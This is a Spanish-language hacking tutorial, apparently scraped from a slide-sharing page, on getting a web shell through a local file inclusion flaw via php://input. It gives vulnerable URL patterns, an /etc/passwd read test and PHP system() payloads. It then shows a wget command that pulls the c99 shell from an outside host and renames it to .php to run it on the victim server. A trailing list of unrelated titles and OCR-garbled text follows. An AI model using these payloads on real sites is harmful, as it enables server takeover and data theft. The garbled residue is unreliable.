Subiendo shell explotando lfi via php input

Clase 8

10-10-2013

Tutorial, el cual consiste en subir una SHELL explotando la vulnerabilidad

LFI vía "php:input" , solo basta con inyectar algunos códigos para obtener

la misma.

Que es el LFI?

Es una falla en la programación de una aplicación; falla mediante la cual se

pueden incluir archivos que se encuentren en el servidor como por ejemplo

el /etc/passwd o algún otro archivo de configuración que nos provea de

información para atacar el sitio.

Ahora bien, empecemos...

Algunos de los sitios webs vulnerables a LFI, tienen este aspecto:

www.sitio-web.com/index.php?page=

www.sitio-web.com/index.php?file=

Recordemos que podemos apoyarnos de los google dorks que se encuentran en la siguiente página:

Ahora bien... para comprobar si realmente el sitio web es vulnerable a LFI, tenemos que ver si la web puede leer el "etc/passwd" cosa que el sitio web quedaría de la siguiente forma:

www.sitio-web.com/index.php?page=/etc/passwd

Si el sitio web puede leer dicho código, la web quedaría así:

Necesitaremos lo siguiente:

Navegador: Firefox

Addon: HackBar

Primero

Cargamos la url vulnerable al HackBar e inyectamos el php://input la cual quedaría así:

www.sitio-web.com/index.php?page=php://input

Habilitamos el "Enable Post data" y colocamos el siguiente comando:

<? system('uname -a'); ?>

Otros comandos: Lista de directorios <? system ('ls'); ?>

Identificación <? system ('id'); ?>

Convertir el formato <? system ('mv file.txt file.php'); ?>

Descargar <? system ('wget'); ?>

Ahora, vamos a utilizar el comando <? system ('wget'); ?> para descargar alguna shell en el sitio.

Utilizaremos esta shell en .txt: http://www.sh3ll.org/c99.txt

<? system ('wget http://www.sh3ll.org/c99.txt'); ?>

Ahora, comprobaremos si la shell se descargo perfectamente, ejecutando el siguiente comando:

<? system ('ls'); ?>

Si la shell, se descargo perfectamente, en este caso lo veremos como c99.txt, como se muestra a continuación

Ahora, como ya sabemos que nuestra shell se ejecuto perfectamente, tenemos que cambiarle el formato a .php para poder ingresar a la misma desde el navegador, solo basta con colocar el siguiente comando:

<? system ('mv c99.txt tensor.php'); ?>

Ahora, en este caso nos dirigimos a www.sitio-web.com/tensor.php

Listo tenemos nuestra shell!!

Subiendo shell explotando lfi via php input

Education

Transcript of Subiendo shell explotando lfi via php input

ugraoopt.admhmao.ru...ISSN 1991-5497 M EX AYH APOAHblÿ1 HAY q H X Y PHA n HAW", Fiat Lux et LUX fil VICKYCCTBOBEAEHL,IE • VICTOPL,lfi KYflbTYPOJIOrV1fi nEAArorv1KA • ncnonorv,lfi

O BKJIIO'I rocynaPCTBel-lHaq Kopnopa141/lfi AreHTCTBO no ... · O BKJIIO'I rocynaPCTBel-lHaq Kopnopa141/lfi AreHTCTBO no CTPaXOBaHL4}O BKJ1aAOB bC o VIKOB CUCTEMbl VI A 059 T LUeCTBO

Como ganar dinero subiendo videos

gana dinero subiendo videos

Explotando Add-Ons de Mozilla Firefox

Megacancionero de LFI

Vigilados: explotando las redes sociales para predecir ...vicenteaguileradiaz.com/...sociales_para_predecir... · Vigilados: explotando las redes sociales para predecir nuestro comportamiento

Boletin 11 subiendo rebalsadors oct 2013

Subiendo ImáGenes A Una Entrada

Subiendo la Colina Nº 1

dalrr:qtru l.uruturlrtl 1}lfi?{rt ffl?l{l} #untiou · dalrr:qtru nr:xieuur lunf; nonuuncl'rlqn:a1utu:tvra flo{lirtn:s.rru l.uruturlrtl 1}lfi?{rt ffl?l{l} qJ z.urrarrilria:r #untiou

Subiendo un Anuncio Destacado

Como incrementar tus ventas explotando nuevos nichos con SEO

Subiendo archivos en Slideshare.

7 subiendo un archivo al grupo

Gana Dinero Subiendo Fotos

EXPLOTANDO VULNERABILIDADES EN EL PROTOCOLO MODBUS …

.. Lfi ~EVISTfi DE FIESTAS DE SfiX - Valle de Elda · 2018-01-23 · Lfi ~EVISTfi DE FIESTAS DE SfiX SEMANARIO DE INFORMACIÓN LOCAL, DEPORTES Y ESPECTÁCULOS Depósito Legal: A -9-1958

Ganar dinero subiendo fotos

ganar dinero subiendo videos